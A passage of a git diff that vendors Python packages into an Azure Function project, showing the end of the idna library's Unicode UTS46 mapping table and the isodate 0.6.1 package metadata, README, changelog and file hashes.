'M', '懞'), + (0x2F8B0, 'M', '懲'), + (0x2F8B1, 'M', '懶'), + (0x2F8B2, 'M', '成'), + (0x2F8B3, 'M', '戛'), + (0x2F8B4, 'M', '扝'), + (0x2F8B5, 'M', '抱'), + (0x2F8B6, 'M', '拔'), + (0x2F8B7, 'M', '捐'), + (0x2F8B8, 'M', '𢬌'), + (0x2F8B9, 'M', '挽'), + (0x2F8BA, 'M', '拼'), + (0x2F8BB, 'M', '捨'), + (0x2F8BC, 'M', '掃'), + (0x2F8BD, 'M', '揤'), + (0x2F8BE, 'M', '𢯱'), + (0x2F8BF, 'M', '搢'), + (0x2F8C0, 'M', '揅'), + (0x2F8C1, 'M', '掩'), + (0x2F8C2, 'M', '㨮'), + (0x2F8C3, 'M', '摩'), + (0x2F8C4, 'M', '摾'), + (0x2F8C5, 'M', '撝'), + (0x2F8C6, 'M', '摷'), + (0x2F8C7, 'M', '㩬'), + (0x2F8C8, 'M', '敏'), + (0x2F8C9, 'M', '敬'), + (0x2F8CA, 'M', '𣀊'), + (0x2F8CB, 'M', '旣'), + (0x2F8CC, 'M', '書'), + (0x2F8CD, 'M', '晉'), + (0x2F8CE, 'M', '㬙'), + (0x2F8CF, 'M', '暑'), + (0x2F8D0, 'M', '㬈'), + (0x2F8D1, 'M', '㫤'), + (0x2F8D2, 'M', '冒'), + (0x2F8D3, 'M', '冕'), + (0x2F8D4, 'M', '最'), + (0x2F8D5, 'M', '暜'), + (0x2F8D6, 'M', '肭'), + (0x2F8D7, 'M', '䏙'), + (0x2F8D8, 'M', '朗'), + (0x2F8D9, 'M', '望'), + (0x2F8DA, 'M', '朡'), + (0x2F8DB, 'M', '杞'), + (0x2F8DC, 'M', '杓'), + (0x2F8DD, 'M', '𣏃'), + (0x2F8DE, 'M', '㭉'), + (0x2F8DF, 'M', '柺'), + (0x2F8E0, 'M', '枅'), + (0x2F8E1, 'M', '桒'), + (0x2F8E2, 'M', '梅'), + (0x2F8E3, 'M', '𣑭'), + (0x2F8E4, 'M', '梎'), + (0x2F8E5, 'M', '栟'), + (0x2F8E6, 'M', '椔'), + (0x2F8E7, 'M', '㮝'), + (0x2F8E8, 'M', '楂'), + (0x2F8E9, 'M', '榣'), + (0x2F8EA, 'M', '槪'), + (0x2F8EB, 'M', '檨'), + (0x2F8EC, 'M', '𣚣'), + (0x2F8ED, 'M', '櫛'), + (0x2F8EE, 'M', '㰘'), + (0x2F8EF, 'M', '次'), + (0x2F8F0, 'M', '𣢧'), + (0x2F8F1, 'M', '歔'), + (0x2F8F2, 'M', '㱎'), + (0x2F8F3, 'M', '歲'), + (0x2F8F4, 'M', '殟'), + (0x2F8F5, 'M', '殺'), + (0x2F8F6, 'M', '殻'), + (0x2F8F7, 'M', '𣪍'), + ] + +def _seg_78() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F8F8, 'M', '𡴋'), + (0x2F8F9, 'M', '𣫺'), + (0x2F8FA, 'M', '汎'), + (0x2F8FB, 'M', '𣲼'), + (0x2F8FC, 'M', '沿'), + (0x2F8FD, 'M', '泍'), + (0x2F8FE, 'M', '汧'), + (0x2F8FF, 'M', '洖'), + (0x2F900, 'M', '派'), + (0x2F901, 'M', '海'), + (0x2F902, 'M', '流'), + (0x2F903, 'M', '浩'), + (0x2F904, 'M', '浸'), + (0x2F905, 'M', '涅'), + (0x2F906, 'M', '𣴞'), + (0x2F907, 'M', '洴'), + 
(0x2F908, 'M', '港'), + (0x2F909, 'M', '湮'), + (0x2F90A, 'M', '㴳'), + (0x2F90B, 'M', '滋'), + (0x2F90C, 'M', '滇'), + (0x2F90D, 'M', '𣻑'), + (0x2F90E, 'M', '淹'), + (0x2F90F, 'M', '潮'), + (0x2F910, 'M', '𣽞'), + (0x2F911, 'M', '𣾎'), + (0x2F912, 'M', '濆'), + (0x2F913, 'M', '瀹'), + (0x2F914, 'M', '瀞'), + (0x2F915, 'M', '瀛'), + (0x2F916, 'M', '㶖'), + (0x2F917, 'M', '灊'), + (0x2F918, 'M', '災'), + (0x2F919, 'M', '灷'), + (0x2F91A, 'M', '炭'), + (0x2F91B, 'M', '𠔥'), + (0x2F91C, 'M', '煅'), + (0x2F91D, 'M', '𤉣'), + (0x2F91E, 'M', '熜'), + (0x2F91F, 'X'), + (0x2F920, 'M', '爨'), + (0x2F921, 'M', '爵'), + (0x2F922, 'M', '牐'), + (0x2F923, 'M', '𤘈'), + (0x2F924, 'M', '犀'), + (0x2F925, 'M', '犕'), + (0x2F926, 'M', '𤜵'), + (0x2F927, 'M', '𤠔'), + (0x2F928, 'M', '獺'), + (0x2F929, 'M', '王'), + (0x2F92A, 'M', '㺬'), + (0x2F92B, 'M', '玥'), + (0x2F92C, 'M', '㺸'), + (0x2F92E, 'M', '瑇'), + (0x2F92F, 'M', '瑜'), + (0x2F930, 'M', '瑱'), + (0x2F931, 'M', '璅'), + (0x2F932, 'M', '瓊'), + (0x2F933, 'M', '㼛'), + (0x2F934, 'M', '甤'), + (0x2F935, 'M', '𤰶'), + (0x2F936, 'M', '甾'), + (0x2F937, 'M', '𤲒'), + (0x2F938, 'M', '異'), + (0x2F939, 'M', '𢆟'), + (0x2F93A, 'M', '瘐'), + (0x2F93B, 'M', '𤾡'), + (0x2F93C, 'M', '𤾸'), + (0x2F93D, 'M', '𥁄'), + (0x2F93E, 'M', '㿼'), + (0x2F93F, 'M', '䀈'), + (0x2F940, 'M', '直'), + (0x2F941, 'M', '𥃳'), + (0x2F942, 'M', '𥃲'), + (0x2F943, 'M', '𥄙'), + (0x2F944, 'M', '𥄳'), + (0x2F945, 'M', '眞'), + (0x2F946, 'M', '真'), + (0x2F948, 'M', '睊'), + (0x2F949, 'M', '䀹'), + (0x2F94A, 'M', '瞋'), + (0x2F94B, 'M', '䁆'), + (0x2F94C, 'M', '䂖'), + (0x2F94D, 'M', '𥐝'), + (0x2F94E, 'M', '硎'), + (0x2F94F, 'M', '碌'), + (0x2F950, 'M', '磌'), + (0x2F951, 'M', '䃣'), + (0x2F952, 'M', '𥘦'), + (0x2F953, 'M', '祖'), + (0x2F954, 'M', '𥚚'), + (0x2F955, 'M', '𥛅'), + (0x2F956, 'M', '福'), + (0x2F957, 'M', '秫'), + (0x2F958, 'M', '䄯'), + (0x2F959, 'M', '穀'), + (0x2F95A, 'M', '穊'), + (0x2F95B, 'M', '穏'), + (0x2F95C, 'M', '𥥼'), + (0x2F95D, 'M', '𥪧'), + ] + +def _seg_79() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F95F, 'X'), + (0x2F960, 'M', '䈂'), + (0x2F961, 'M', '𥮫'), + (0x2F962, 'M', '篆'), + (0x2F963, 'M', '築'), + (0x2F964, 'M', '䈧'), + (0x2F965, 'M', '𥲀'), + (0x2F966, 'M', '糒'), + (0x2F967, 'M', '䊠'), + (0x2F968, 'M', '糨'), + (0x2F969, 'M', '糣'), + (0x2F96A, 'M', '紀'), + (0x2F96B, 'M', '𥾆'), + (0x2F96C, 'M', '絣'), + (0x2F96D, 'M', '䌁'), + (0x2F96E, 'M', '緇'), + (0x2F96F, 'M', '縂'), + (0x2F970, 'M', '繅'), + (0x2F971, 'M', '䌴'), + (0x2F972, 'M', '𦈨'), + (0x2F973, 'M', '𦉇'), + (0x2F974, 'M', '䍙'), + (0x2F975, 'M', '𦋙'), + (0x2F976, 'M', '罺'), + (0x2F977, 'M', '𦌾'), + (0x2F978, 'M', '羕'), + (0x2F979, 'M', '翺'), + (0x2F97A, 'M', '者'), + (0x2F97B, 'M', '𦓚'), + (0x2F97C, 'M', '𦔣'), + (0x2F97D, 'M', '聠'), + (0x2F97E, 'M', '𦖨'), + (0x2F97F, 'M', '聰'), + (0x2F980, 'M', '𣍟'), + (0x2F981, 'M', '䏕'), + (0x2F982, 'M', '育'), + (0x2F983, 'M', '脃'), + (0x2F984, 'M', '䐋'), + (0x2F985, 'M', '脾'), + (0x2F986, 'M', '媵'), + (0x2F987, 'M', '𦞧'), + (0x2F988, 'M', '𦞵'), + (0x2F989, 'M', '𣎓'), + (0x2F98A, 'M', '𣎜'), + (0x2F98B, 'M', '舁'), + (0x2F98C, 'M', '舄'), + (0x2F98D, 'M', '辞'), + (0x2F98E, 'M', '䑫'), + (0x2F98F, 'M', '芑'), + (0x2F990, 'M', '芋'), + (0x2F991, 'M', '芝'), + (0x2F992, 'M', '劳'), + (0x2F993, 'M', '花'), + (0x2F994, 'M', '芳'), + (0x2F995, 'M', '芽'), + (0x2F996, 'M', '苦'), + (0x2F997, 'M', '𦬼'), + (0x2F998, 'M', '若'), + (0x2F999, 'M', '茝'), + (0x2F99A, 'M', '荣'), + (0x2F99B, 'M', '莭'), + (0x2F99C, 'M', '茣'), + (0x2F99D, 'M', '莽'), + (0x2F99E, 'M', '菧'), + (0x2F99F, 'M', '著'), + (0x2F9A0, 'M', '荓'), + (0x2F9A1, 'M', '菊'), + 
(0x2F9A2, 'M', '菌'), + (0x2F9A3, 'M', '菜'), + (0x2F9A4, 'M', '𦰶'), + (0x2F9A5, 'M', '𦵫'), + (0x2F9A6, 'M', '𦳕'), + (0x2F9A7, 'M', '䔫'), + (0x2F9A8, 'M', '蓱'), + (0x2F9A9, 'M', '蓳'), + (0x2F9AA, 'M', '蔖'), + (0x2F9AB, 'M', '𧏊'), + (0x2F9AC, 'M', '蕤'), + (0x2F9AD, 'M', '𦼬'), + (0x2F9AE, 'M', '䕝'), + (0x2F9AF, 'M', '䕡'), + (0x2F9B0, 'M', '𦾱'), + (0x2F9B1, 'M', '𧃒'), + (0x2F9B2, 'M', '䕫'), + (0x2F9B3, 'M', '虐'), + (0x2F9B4, 'M', '虜'), + (0x2F9B5, 'M', '虧'), + (0x2F9B6, 'M', '虩'), + (0x2F9B7, 'M', '蚩'), + (0x2F9B8, 'M', '蚈'), + (0x2F9B9, 'M', '蜎'), + (0x2F9BA, 'M', '蛢'), + (0x2F9BB, 'M', '蝹'), + (0x2F9BC, 'M', '蜨'), + (0x2F9BD, 'M', '蝫'), + (0x2F9BE, 'M', '螆'), + (0x2F9BF, 'X'), + (0x2F9C0, 'M', '蟡'), + (0x2F9C1, 'M', '蠁'), + (0x2F9C2, 'M', '䗹'), + ] + +def _seg_80() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F9C3, 'M', '衠'), + (0x2F9C4, 'M', '衣'), + (0x2F9C5, 'M', '𧙧'), + (0x2F9C6, 'M', '裗'), + (0x2F9C7, 'M', '裞'), + (0x2F9C8, 'M', '䘵'), + (0x2F9C9, 'M', '裺'), + (0x2F9CA, 'M', '㒻'), + (0x2F9CB, 'M', '𧢮'), + (0x2F9CC, 'M', '𧥦'), + (0x2F9CD, 'M', '䚾'), + (0x2F9CE, 'M', '䛇'), + (0x2F9CF, 'M', '誠'), + (0x2F9D0, 'M', '諭'), + (0x2F9D1, 'M', '變'), + (0x2F9D2, 'M', '豕'), + (0x2F9D3, 'M', '𧲨'), + (0x2F9D4, 'M', '貫'), + (0x2F9D5, 'M', '賁'), + (0x2F9D6, 'M', '贛'), + (0x2F9D7, 'M', '起'), + (0x2F9D8, 'M', '𧼯'), + (0x2F9D9, 'M', '𠠄'), + (0x2F9DA, 'M', '跋'), + (0x2F9DB, 'M', '趼'), + (0x2F9DC, 'M', '跰'), + (0x2F9DD, 'M', '𠣞'), + (0x2F9DE, 'M', '軔'), + (0x2F9DF, 'M', '輸'), + (0x2F9E0, 'M', '𨗒'), + (0x2F9E1, 'M', '𨗭'), + (0x2F9E2, 'M', '邔'), + (0x2F9E3, 'M', '郱'), + (0x2F9E4, 'M', '鄑'), + (0x2F9E5, 'M', '𨜮'), + (0x2F9E6, 'M', '鄛'), + (0x2F9E7, 'M', '鈸'), + (0x2F9E8, 'M', '鋗'), + (0x2F9E9, 'M', '鋘'), + (0x2F9EA, 'M', '鉼'), + (0x2F9EB, 'M', '鏹'), + (0x2F9EC, 'M', '鐕'), + (0x2F9ED, 'M', '𨯺'), + (0x2F9EE, 'M', '開'), + (0x2F9EF, 'M', '䦕'), + (0x2F9F0, 'M', '閷'), + (0x2F9F1, 'M', '𨵷'), + (0x2F9F2, 'M', '䧦'), + (0x2F9F3, 'M', '雃'), + (0x2F9F4, 'M', '嶲'), + (0x2F9F5, 'M', '霣'), + (0x2F9F6, 'M', '𩅅'), + (0x2F9F7, 'M', '𩈚'), + (0x2F9F8, 'M', '䩮'), + (0x2F9F9, 'M', '䩶'), + (0x2F9FA, 'M', '韠'), + (0x2F9FB, 'M', '𩐊'), + (0x2F9FC, 'M', '䪲'), + (0x2F9FD, 'M', '𩒖'), + (0x2F9FE, 'M', '頋'), + (0x2FA00, 'M', '頩'), + (0x2FA01, 'M', '𩖶'), + (0x2FA02, 'M', '飢'), + (0x2FA03, 'M', '䬳'), + (0x2FA04, 'M', '餩'), + (0x2FA05, 'M', '馧'), + (0x2FA06, 'M', '駂'), + (0x2FA07, 'M', '駾'), + (0x2FA08, 'M', '䯎'), + (0x2FA09, 'M', '𩬰'), + (0x2FA0A, 'M', '鬒'), + (0x2FA0B, 'M', '鱀'), + (0x2FA0C, 'M', '鳽'), + (0x2FA0D, 'M', '䳎'), + (0x2FA0E, 'M', '䳭'), + (0x2FA0F, 'M', '鵧'), + (0x2FA10, 'M', '𪃎'), + (0x2FA11, 'M', '䳸'), + (0x2FA12, 'M', '𪄅'), + (0x2FA13, 'M', '𪈎'), + (0x2FA14, 'M', '𪊑'), + (0x2FA15, 'M', '麻'), + (0x2FA16, 'M', '䵖'), + (0x2FA17, 'M', '黹'), + (0x2FA18, 'M', '黾'), + (0x2FA19, 'M', '鼅'), + (0x2FA1A, 'M', '鼏'), + (0x2FA1B, 'M', '鼖'), + (0x2FA1C, 'M', '鼻'), + (0x2FA1D, 'M', '𪘀'), + (0x2FA1E, 'X'), + (0x30000, 'V'), + (0x3134B, 'X'), + (0xE0100, 'I'), + (0xE01F0, 'X'), + ] + +uts46data = tuple( + _seg_0() + + _seg_1() + + _seg_2() + + _seg_3() + + _seg_4() + + _seg_5() + + _seg_6() + + _seg_7() + + _seg_8() + + _seg_9() + + _seg_10() + + _seg_11() + + _seg_12() + + _seg_13() + + _seg_14() + + _seg_15() + + _seg_16() + + _seg_17() + + _seg_18() + + _seg_19() + + _seg_20() + + _seg_21() + + _seg_22() + + _seg_23() + + _seg_24() + + _seg_25() + + _seg_26() + + _seg_27() + + _seg_28() + + _seg_29() + + _seg_30() + + _seg_31() + + _seg_32() + + _seg_33() + + _seg_34() + + _seg_35() + + _seg_36() + + _seg_37() + + 
_seg_38() +
+    _seg_39() +
+    _seg_40() +
+    _seg_41() +
+    _seg_42() +
+    _seg_43() +
+    _seg_44() +
+    _seg_45() +
+    _seg_46() +
+    _seg_47() +
+    _seg_48() +
+    _seg_49() +
+    _seg_50() +
+    _seg_51() +
+    _seg_52() +
+    _seg_53() +
+    _seg_54() +
+    _seg_55() +
+    _seg_56() +
+    _seg_57() +
+    _seg_58() +
+    _seg_59() +
+    _seg_60() +
+    _seg_61() +
+    _seg_62() +
+    _seg_63() +
+    _seg_64() +
+    _seg_65() +
+    _seg_66() +
+    _seg_67() +
+    _seg_68() +
+    _seg_69() +
+    _seg_70() +
+    _seg_71() +
+    _seg_72() +
+    _seg_73() +
+    _seg_74() +
+    _seg_75() +
+    _seg_76() +
+    _seg_77() +
+    _seg_78() +
+    _seg_79() +
+    _seg_80()
+) # type: Tuple[Union[Tuple[int, str], Tuple[int, str, str]], ...]
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/INSTALLER
new file mode 100644
index 0000000..4660be2
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/INSTALLER
@@ -0,0 +1 @@
+pip
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/METADATA
new file mode 100644
index 0000000..3a9f8f7
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/METADATA
@@ -0,0 +1,291 @@
+Metadata-Version: 2.1
+Name: isodate
+Version: 0.6.1
+Summary: An ISO 8601 date/time/duration parser and formatter
+Home-page: https://github.com/gweis/isodate/
+Author: Gerhard Weis
+Author-email: gerhard.weis@proclos.com
+License: BSD
+Platform: UNKNOWN
+Classifier: Development Status :: 4 - Beta
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: BSD License
+Classifier: Operating System :: OS Independent
+Classifier: Programming Language :: Python
+Classifier: Programming Language :: Python :: 2
+Classifier: Programming Language :: Python :: 2.7
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: Implementation :: PyPy
+Classifier: Topic :: Internet
+Classifier: Topic :: Software Development :: Libraries :: Python Modules
+Requires-Dist: six
+
+
+ISO 8601 date/time parser
+=========================
+
+.. image:: https://travis-ci.org/gweis/isodate.svg?branch=master
+    :target: https://travis-ci.org/gweis/isodate
+    :alt: Travis-CI
+.. image:: https://coveralls.io/repos/gweis/isodate/badge.svg?branch=master
+    :target: https://coveralls.io/r/gweis/isodate?branch=master
+    :alt: Coveralls
+.. image:: https://img.shields.io/pypi/v/isodate.svg
+    :target: https://pypi.python.org/pypi/isodate/
+    :alt: Latest Version
+.. image:: https://img.shields.io/pypi/l/isodate.svg
+    :target: https://pypi.python.org/pypi/isodate/
+    :alt: License
+
+
+This module implements ISO 8601 date, time and duration parsing.
+The implementation follows the ISO 8601:2004 standard and implements only
+the date/time representations mentioned in the standard. If something is not
+mentioned there, it is treated as non-existent, not as an allowed
+option.
+
+For instance, ISO 8601:2004 never mentions two-digit years, so this module
+does not aim to support them (even though a two-digit year may still be a
+valid ISO date, since it is not explicitly forbidden).
+Another example: when no time zone information is given for a time, it is
+interpreted as local time, not UTC.
+
+As this module maps ISO 8601 dates/times to standard Python data types, such
+as *date*, *time*, *datetime* and *timedelta*, it is not possible to convert
+every possible ISO 8601 date/time. For instance, dates before 0001-01-01 are
+not allowed by the Python *date* and *datetime* classes. Additionally,
+fractional seconds are limited to microseconds; if the parser finds, for
+instance, nanoseconds, it rounds them to microseconds.
+
+Documentation
+-------------
+
+Currently there are five parsing methods available (a short usage sketch
+follows the limitations section below).
+ * parse_time:
+      parses an ISO 8601 time string into a *time* object
+ * parse_date:
+      parses an ISO 8601 date string into a *date* object
+ * parse_datetime:
+      parses an ISO 8601 date-time string into a *datetime* object
+ * parse_duration:
+      parses an ISO 8601 duration string into a *timedelta* or *Duration*
+      object.
+ * parse_tzinfo:
+      parses the time zone info part of an ISO 8601 string into a
+      *tzinfo* object.
+
+As ISO 8601 allows durations to be defined in years and months, and
+*timedelta* does not handle years and months, this module provides a
+*Duration* class, which can be used almost like a *timedelta* object (with
+some limitations). However, a *Duration* object can be converted into a
+*timedelta* object.
+
+There are also ISO formatting methods for all supported data types. Each
+*xxx_isoformat* method accepts a format parameter. The default format is
+always the ISO 8601 expanded format. This is the same format used by
+*datetime.isoformat*:
+
+ * time_isoformat:
+      Intended to create ISO time strings with default format
+      *hh:mm:ssZ*.
+ * date_isoformat:
+      Intended to create ISO date strings with default format
+      *yyyy-mm-dd*.
+ * datetime_isoformat:
+      Intended to create ISO date-time strings with default format
+      *yyyy-mm-ddThh:mm:ssZ*.
+ * duration_isoformat:
+      Intended to create ISO duration strings with default format
+      *PnnYnnMnnDTnnHnnMnnS*.
+ * tz_isoformat:
+      Intended to create ISO time zone strings with default format
+      *hh:mm*.
+ * strftime:
+      A re-implementation mostly compatible with Python's *strftime*, but
+      it supports only those format strings which can also be used for
+      dates prior to 1900. This method also understands how to format
+      *datetime* and *Duration* instances.
+
+Installation:
+-------------
+
+This module can easily be installed with Python standard installation methods.
+
+Either use *python setup.py install* or, in case you have *setuptools* or
+*distribute* available, you can also use *easy_install*.
+
+Limitations:
+------------
+
+ * The parser accepts several date/time representations which should be
+   invalid according to the ISO 8601 standard.
+
+   1. For date and time together, this parser accepts a mixture of basic and
+      extended format, e.g. the date could be in basic format, while the
+      time is accepted in extended format. It also allows short dates and
+      times in date-time strings.
+   2. For incomplete dates, the first day is chosen. E.g. the 19th century
+      results in a date of 1901-01-01.
+   3. Negative *Duration* and *timedelta* values are not fully supported yet.
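+
+A quick usage sketch (added here for illustration; the commented values are
+the results the parser is expected to produce)::
+
+    import isodate
+
+    # parsing: ISO 8601 strings map onto standard Python types ...
+    isodate.parse_date("2012-10-30")        # datetime.date(2012, 10, 30)
+    isodate.parse_datetime("2012-10-30T09:30:00Z")  # timezone-aware datetime
+    isodate.parse_duration("PT1H30M")       # timedelta(hours=1, minutes=30)
+
+    # ... except durations containing years or months, which need Duration.
+    dur = isodate.parse_duration("P1Y2M10D")  # isodate.duration.Duration
+
+    # formatting: each supported type has a matching *_isoformat method.
+    isodate.duration_isoformat(dur)         # 'P1Y2M10D'
+    isodate.date_isoformat(isodate.parse_date("2012-10-30"))  # '2012-10-30'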
+
+Further information:
+--------------------
+
+The docstrings and unit tests provide rather detailed information about
+the methods and their limitations.
+
+The source release provides a *setup.py* script,
+which can be used to run the unit tests included.
+
+Source code is available at `<https://github.com/gweis/isodate>`_.
+
+CHANGES
+=======
+
+0.6.1 (2021-12-13)
+------------------
+
+- support python 3.10
+- last version to support py 2.7
+
+
+0.6.0 (2017-10-13)
+------------------
+
+- support incomplete month date (Fabien Loffredo)
+- rely on duck typing when doing duration maths
+- support ':' as separator in fractional time zones (usrenmae)
+
+
+0.5.4 (2015-08-06)
+------------------
+
+- Fix parsing of Periods (Fabien Bochu)
+- Make Duration objects hashable (Geoffrey Fairchild)
+- Add multiplication to duration (Reinoud Elhorst)
+
+
+0.5.1 (2014-11-07)
+------------------
+
+- fixed pickling of Duration objects
+- raise ISO8601Error when there is no 'T' separator in datetime strings
+  (Adrian Coveney)
+
+
+0.5.0 (2014-02-23)
+------------------
+
+- ISO8601Error are subclasses of ValueError now (Michael Hrivnak)
+- improve compatibility across various python variants and versions
+- raise exceptions when using fractional years and months in date
+  maths with durations
+- renamed method todatetime on Duration objects to totimedelta
+
+
+0.4.9 (2012-10-30)
+------------------
+
+- support pickling FixedOffset instances
+- make sure parsed fractional seconds are in microseconds
+- add leading zeros when formatting microseconds (Jarom Loveridge)
+
+
+0.4.8 (2012-05-04)
+------------------
+
+- fixed incompatibility of unittests with python 2.5 and 2.6 (runs fine on
+  2.7 and 3.2)
+
+
+0.4.7 (2012-01-26)
+------------------
+
+- fixed tzinfo formatting (never pass None into tzinfo.utcoffset())
+
+
+0.4.6 (2012-01-06)
+------------------
+
+- added Python 3 compatibility via 2to3
+
+0.4.5 (2012-01-06)
+------------------
+
+- made setuptools dependency optional
+
+0.4.4 (2011-04-16)
+------------------
+
+- Fixed formatting of microseconds for datetime objects
+
+0.4.3 (2010-10-29)
+------------------
+
+- Fixed problem with %P formatting and fractions (supplied by David Brooks)
+
+0.4.2 (2010-10-28)
+------------------
+
+- Implemented unary - for Duration (supplied by David Brooks)
+- Output fractional seconds with '%P' format. (partly supplied by David
+  Brooks)
+
+0.4.1 (2010-10-13)
+------------------
+
+- fixed bug in comparison between timedelta and Duration.
+- fixed precision problem with microseconds (reported by Tommi Virtanen)
+
+0.4.0 (2009-02-09)
+------------------
+
+- added method to parse ISO 8601 time zone strings
+- added methods to create ISO 8601 conforming strings
+
+0.3.0 (2009-1-05)
+------------------
+
+- Initial release
+
+TODOs
+=====
+
+This to-do list contains some thoughts and ideas about missing features and
+parts to think about, whether to implement them or not. This list is probably
+not complete.
+
+Missing features:
+-----------------
+
+    * time formatting does not allow creating fractional representations.
+    * parser for ISO intervals.
+    * currently microseconds are always padded to a length of 6 characters;
+      trailing 0s should be optional.
+
+Documentation:
+--------------
+
+    * parse_datetime:
+      - complete the documentation to show what this function allows but ISO
+        forbids, and vice versa.
+      - support other separators between date and time than 'T'
+
+    * parse_date:
+      - yeardigits should always be greater than 4
+      - dates before 0001-01-01 are not supported
+
+    * parse_duration:
+      - alternative formats are not fully supported due to parse_date
+        restrictions
+      - standard duration format is fully supported but not very restrictive.
+
+    * Duration:
+      - support fractional years and months in calculations
+      - implement w3c order relation?
+      - refactor to have duration mathematics only at one place.
+      - localize __str__ method (does timedelta do this?)
+      - when is a Duration negative?
+      - normalize Durations: months [00-12] and years ]-inf,+inf[
+
+
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/RECORD
new file mode 100644
index 0000000..22efb60
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/RECORD
@@ -0,0 +1,39 @@
+isodate-0.6.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4
+isodate-0.6.1.dist-info/METADATA,sha256=t7C7UpZWdkeqCL5RJVeDivzIISrnb-xf3VivlJb7mC0,9603
+isodate-0.6.1.dist-info/RECORD,,
+isodate-0.6.1.dist-info/WHEEL,sha256=Z-nyYpwrcSqxfdux5Mbn_DQ525iP7J2DG3JgGvOYyTQ,110
+isodate-0.6.1.dist-info/top_level.txt,sha256=JgdqaHBw0Vx74Km0xZ1-6npOUHe_6cKHSBCEx6ppVe8,8
+isodate/__init__.py,sha256=jRGDoJaMif21v3bVrIg-nTFaSRnbnDeXtL_sUhKx7Zw,4099
+isodate/__pycache__/__init__.cpython-39.pyc,,
+isodate/__pycache__/duration.cpython-39.pyc,,
+isodate/__pycache__/isodates.cpython-39.pyc,,
+isodate/__pycache__/isodatetime.cpython-39.pyc,,
+isodate/__pycache__/isoduration.cpython-39.pyc,,
+isodate/__pycache__/isoerror.cpython-39.pyc,,
+isodate/__pycache__/isostrf.cpython-39.pyc,,
+isodate/__pycache__/isotime.cpython-39.pyc,,
+isodate/__pycache__/isotzinfo.cpython-39.pyc,,
+isodate/__pycache__/tzinfo.cpython-39.pyc,,
+isodate/duration.py,sha256=yB_93UrtSusZeuMIllS-WB7-eS8P_6q8KHeYaWoGCq0,12532
+isodate/isodates.py,sha256=5oUl50kmeZLMCQS56OwvZsz-uEy00VbkXqzQKYNtOMg,10620
+isodate/isodatetime.py,sha256=cHn2SoEqwETg9e_zBRtjN7eRSWKD6KpHDcVxSgnXmnw,2955
+isodate/isoduration.py,sha256=UxzMJDW5A5dbFT8Sxi4uSHysAOVh8OMPOaXC7m3RMUE,6705
+isodate/isoerror.py,sha256=DeD6rysn0sqqqdTD_3X5R5mHhV5UD75r7g2KyyQPN9k,1714
+isodate/isostrf.py,sha256=pwIQqH5MLvNUtR3W0kHCb8wj4liKWpWlcvBlobad--c,9252
+isodate/isotime.py,sha256=kCuXRDizKjBzKHXfMtl82fK5f7piSV53WWDd15RjNCs,7198
+isodate/isotzinfo.py,sha256=0XT-jc3WAh0eCmfXbCNkOzrLaxStHCYF9jUWyBILWp4,4217
+isodate/tests/__init__.py,sha256=nnTKaFDY0-3DWBbeMhhIsWjMIagLdZW1YE5HlLaI-fg,2184
+isodate/tests/__pycache__/__init__.cpython-39.pyc,,
+isodate/tests/__pycache__/test_date.cpython-39.pyc,,
+isodate/tests/__pycache__/test_datetime.cpython-39.pyc,,
+isodate/tests/__pycache__/test_duration.cpython-39.pyc,,
+isodate/tests/__pycache__/test_pickle.cpython-39.pyc,,
+isodate/tests/__pycache__/test_strf.cpython-39.pyc,,
+isodate/tests/__pycache__/test_time.cpython-39.pyc,,
+isodate/tests/test_date.py,sha256=L7dhYuYKJ-LMZw5qOjvtT0qChXIpBqZY0Mx0XbHEL28,6090
+isodate/tests/test_datetime.py,sha256=lwQsuRXlFrMeqDCR5lQ8V6vrLDZrxBVgSDCRRCOXc6Q,7387
+isodate/tests/test_duration.py,sha256=fTsyLOOx0-kjk-D6wzFutpOePrIgyu3kO58lWwyJsuI,24096
+isodate/tests/test_pickle.py,sha256=kuuRc01OKYQ5_sqZGvOF41FIc3gEgecRZM1U9HJDckQ,1845
+isodate/tests/test_strf.py,sha256=Nv4ZCXZzUNEFL8Cxgr8qe3WDv01WU7_e2ktcohHIL3s,5241
+isodate/tests/test_time.py,sha256=1KOxOOV4iTJ8UKu005dGEmBumQr3vokMK8fWK6qgpe4,6715
+isodate/tzinfo.py,sha256=dzVxjzlMDiuFiaJZT638t9b67GhZU8PAmP9-JgxcDIU,3692
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/WHEEL
new file mode 100644
index 0000000..e283ba9
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/WHEEL
@@ -0,0 +1,6 @@
+Wheel-Version: 1.0
+Generator: bdist_wheel (0.36.2)
+Root-Is-Purelib: true
+Tag: py2-none-any
+Tag: py3-none-any
+
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/top_level.txt
new file mode 100644
index 0000000..481cd26
